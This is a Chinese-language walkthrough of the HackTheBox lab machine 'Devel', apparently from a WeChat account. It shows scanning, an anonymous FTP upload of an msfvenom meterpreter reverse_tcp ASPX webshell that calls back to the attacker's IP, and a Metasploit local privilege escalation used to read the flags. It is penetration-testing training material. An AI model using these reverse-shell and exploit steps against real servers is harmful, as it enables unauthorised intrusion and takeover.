靶机地址:
https://app.hackthebox.com/machines/Devel
靶场: HackTheBox.com
靶机名称:Devel
难度: 简单
提示信息:
无
目标: user.txt和root.txt
攻击机:Kali 10.10.16.3
靶机:10.10.10.5
扫描靶机开放的服务端口
sudo masscan -p1-65535 -e tun0 10.10.10.5
sudo nmap -sC -sV -p 21,80 10.10.10.5 -oN nmap.log
从扫描结果中看到ftp允许匿名访问,80端口使用IIS7.5提供服务,先来看看21端口
ftp 10.10.10.5
ftp中只有IIS默认文件位置应该在IIS的根目录,访问80端口同样是IIS的默认页面,可以看出IIS与FTP在同一个目录下,那就可以利用ftp上传webshell
使用msfvenom生成后门
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.16.3 LPORT=4444 -f aspx >shell.aspx
msf中设置监听
msfconsole
use exploit/multi/handler
options
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.16.3
set LPORT 4444
run
上传webshell到ftp根目录中
ftp 10.10.10.5
put shell.aspx
上传完成,访问webshell地址
http://10.10.10.5/shell.aspx
反弹成功,查看权限收集敏感信息
将后门自动迁移到稳定的进程中
run post/windows/manage/migrate
提权
background
use post/multi/recon/local_exploit_suggester
set session 1
exploit
这些都是提示可能存在的漏洞,随便找一个验证下
use exploit/windows/local/ntusermndragover
show options
set session 1
set LHOST 10.10.16.3
set LPORT 3333
run
提权成功,来找下flag
shell
cd c:\users
dir
type babis\desktop\user.txt
type administrator\desktop\root.txt
拿到flag,游戏结束
星 球 免 费 福 利
转发公众号本文到朋友圈
截图到公众号后台第1、3、5名获取免费进入星球
欢 迎 加 入 星 球 !
关 注 有 礼
还在等什么?赶紧点击下方名片关注学习吧!
推荐阅读